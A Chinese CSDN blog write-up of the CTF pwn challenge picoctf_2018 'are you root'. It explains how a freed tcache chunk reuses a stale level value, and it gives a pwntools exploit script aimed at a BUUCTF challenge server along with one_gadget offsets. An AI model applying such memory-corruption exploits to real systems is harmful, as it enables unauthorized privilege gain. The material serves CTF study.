picoctf_2018_are you root

最新推荐文章于 2023-02-10 11:09:43 发布
最新推荐文章于 2023-02-10 11:09:43 发布
阅读量183 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121140324
版权

picoctf_2018_are you root:

参考博客:
ha1vk
程序功能到达level5能打出flag,正常运行的话不会让你到达level5

login功能:

strdup()在内部调用了malloc()为变量分配内存
返回一个指针,指向为复制字符串分配的空间
请添加图片描述
可以看到是申请了两个chunk,且我们的level参数就存在后面
请添加图片描述

直接说解法:

就是输name的我们填满8个a,然后就可以改到level参数
strdup会把name copy下去,包括level参数,我们free它的话,释放到tcachebin0x20,level参数还在,我们再login的话,如果是0x20大小,就从tcachebin中取,level参数未初始化,还是5。就能接受flag了

exp:

from pwn import *
from LibcSearcher import *
local_file  = './PicoCTF_2018_are_you_root'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',29317 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#-----------------------------
sla('> ','login aaaaaaaa'+p64(5))
sla('> ','reset')
sla('> ','login aaaa')
sla('> ','get-flag')
#debug()
r.interactive()

其他:

我u18本地把库与连接改成远端之后调试看:
请添加图片描述
请添加图片描述
而如果我用本地的库与链接,登出时,也就是free就有所不同
后面的5直接被改掉了,很是疑惑,
请添加图片描述

Nq0inaen
关注
专栏目录
/root/anaconda/lib/liblzma.so.5: version `XZ_5.1.2alpha‘ not found required /lib64/librpmio.so解决方案
weixin_43178406的博客
03-14 9万+
本文主要介绍了/root/anaconda3/lib/liblzma.so.5: version `XZ_5.1.2alpha’ not found (required by /lib64/librpmio.so.3)解决方案,希望能对使用Linux的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
thinkphp __PUBLIC__的定义 __ROOT__等常量的定义
likaibk的博客
07-13 5481
1. '__TMPL__'      =>  APP_TMPL_PATH,  // 项目模板目录 2. '__ROOT__'      =>  __ROOT__,       // 当前网站地址 3. '__APP__'       =>  __APP__,        // 当前项目地址 4. '__GROUP__'     =>  defined('GROUP_NAME')
picoCTF-2020-撰写:picoCTF 2020解决方案的撰写
02-21
picoCTF 2020撰写 此存储库包含picoCTF 2020的字样,提示和解决方案。每个文件夹对每个类别都有相应的问题。 麻省理工学院 版权所有2021 Adam Jeniski和Caleb Garrick 特此免费授予获得该软件和相关文档文件(“软件”)副本的任何人无限制使用软件的权利,包括但不限于使用,复制,修改,合并的权利,发布,分发,再许可和/或出售本软件的副本,并允许具备软件的人员这样做,但须满足以下条件: 以上版权声明和本许可声明应包含在本软件的所有副本或大部分内容中。 该软件按“原样”提供,不提供任何形式的明示或暗示担保,包括但不限于对适销性,特定目的的适用性和非侵权性的担保。 无论是由于软件,使用或其他方式产生的,与之有关或与之有关的合同,侵权或其他形式的任何索赔,损害或其他责任,作者或版权所有者概不负责。软件。
[BUUCTF-pwn]——picoctf_2018_are you root
Y_peak的博客
03-09 329
[BUUCTF-pwn]——picoctf_2018_are you root 题目地址:点这里 害,有点小烧脑子这道题. 又学习了几个没见过的C语言函数 peak小知识 strtok: 第一次使用时候,需要两个参数从第一个参数开始,到第二个参数接断并且返回. strdup: malloc一个参数字符串大小的内存,并且将字符串拷贝进去. 正文 下面进入正文,首先checksec看下 再去IDA中看下, 好明显的暗示 紧接着去看看代码, 想要进入give-flag函数, 需要v6 不为0, 同时
[buuctf]picoctf_2018_are you root未初始化漏洞
weixin_46521144的博客
04-02 301
挺神奇的这道题,本地就是打不通,远程可以打通,绝了到底是为什么??? 本来以为这道题有一个指针置0的操作就没有UAF了,看来是我还见得太少,把UAF理解错了(其实我也没开始学堆哈哈哈哈) 参考了网上师傅的解答,发现这里是一个未初始化漏洞。我画个栈帧大家就明白了 先写一下函数长什么样 栈帧长这样 注意到一开始v6是一个二级指针,也就是指向数组的数组 strtok分配的内容是存在*v6里面的,所以上述栈帧应该是对的 那么在用完free之后呢,这里的指针归零是指:不能再用该指针寻
[BUUCTF]PWN——picoctf_2018_are you root(程序逻辑错误)
mcmuyanga的博客
03-17 478
picoctf_2018_are you root 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况
NFS配置项no_root_squash和root_squash的区别
angaoux03775的博客
08-03 6171
1、鸟哥的私房菜简体中文 http://linux-vbird.hillwood.cn/linux_server/0330nfs.htm 鸟哥的私房菜繁体中文 http://linux.vbird.org/linux_server/0330nfs.php2、http://www.l-penguin.idv.tw/article/nfs-automount.htm3、http:/...
picoCTF2018 Writeup之Web Exploitation
zwish的信安之路
09-16 1752
My New Website 打开发现是个登录界面,随便输入账号密码登陆成功,然后发现cookie里面有个admin字段为false,改为True(一定要大写) 得到flag:picoCTF{l0g1ns_ar3nt_r34l_92020990} Irish Name Repo 没有任何过滤的注入,直接到/admin登录页面,使用万能密码admin' or '1'='1登录即可 my r...
You're using the staticfiles app without having set the STATIC_ROOT setting to a filesystem path.
tymatlab的专栏
10-30 3580
【问题】Heroku部署报错:remote: django.core.exceptions.ImproperlyConfigured: You're using the staticfiles app without having set the STATIC_ROOT setting to a filesystem path.
PicoCTF_2018_are_you_root(未初始化验证漏洞)
seaaseesa的博客
04-17 857
PicoCTF_2018_are_you_root 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。 Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符...
Ubuntu中遇到Unable to lock the administration directory (/var/lib/dpkg/),are you root?
zxlworking1的专栏
06-11 2539
当我们在ubuntu中使用 su do执行命令时,提示: Unable to lock the administration directory (/var/lib/dpkg/),are you root? 可以尝试以下方式处理: sudo rm -rf /var/lib/dpkg/lock sudo rm -rf /var/cache/apt/archives/lock sudo ...
Unable to lock the administration directory (/var/lib/dpkg/),are you root?
watermelon的博客
11-02 477
在用命令行安装软件包或者软件包更新sudo apt-get update过程中提示Unable to lock the administration directory (/var/lib/dpkg/),are you root? sudo rm -rf /var/lib/dpkg/lock sudo rm -rf /var/cache/apt/archives/lock sudo apt-get update sudo dpkg –-configure -a ...
在Ubuntu中遇到Unable to lock the administration directory (/var/lib/dpkg/),are you root? 问题解决办法
热门推荐
weizhiai12的专栏
04-03 1万+
在Ubuntu中遇到Unable to lock the administration directory (/var/lib/dpkg/),are you root? 问题解决办法 2015-12-02 19:14:09来源:CSDN作者:qq_27645299937人点击 在新装的Ubuntu虚拟系统中,安装docker,如果出现关于文件root问题,按照如下操作,尝试解决。(每行独立运行
picoctf-Scavenger Hunt wp
m0_62851980的博客
03-27 319
打开网址先f12查看源代码,在body中看到:<!-- Here's the first part of the flag: picoCTF{t --> 明显flag分为好几个部分,一个一个找嘛: 查看网页时What一行下面给了一部分提示: What I used these to make this site: HTML CSS JS (JavaScript) 而在源代码中能看到mycss.css和myjs.js,那先在网址后输入/mycss.css,就能看到一部分代码:
picoCTF,Binary Exploitation,二进制类,23/37
Allezima阿力代码
02-10 1179
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
picoCTF,Reverse Engineering,逆向类,42/55
Allezima阿力代码
02-10 1716
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
picoCTF,General Skills,基本技能类,34/34
Allezima阿力代码
12-28 2027
自己做的CTF,记录一下。后期不断编辑。
picoctf——Insp3ct0r wp
m0_62851980的博客
03-25 330
打开网页没有什么信息,直接f12: 提示的很清楚了: <!-- Html is neat. Anyways have 1/3 of the flag: picoCTF{tru3_d3 --> 这一部分的注释告诉我们flag被分为了三部分,而已知: so,剩下的flag必在css和js里 用Ctrl r刷新网络,圈出来css和js: 可以知道myjs.js有一部分flag(3/3),直接网址输入myjs.js查看即可,同理,我们在查看器查看源码,可以看到css的名称..
TARGET_ROOT_OUT
最新发布
09-09
TARGET_ROOT_OUT 是指在 Android 编译过程中,输出的目标文件夹路径,即编译后的目标设备的根目录。它的值可以通过以下公式计算得到:PROUDCT_OUT = out/target/product/xxx/$(TARGET_COPY_OUT_ROOT) ,其中 xxx 是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值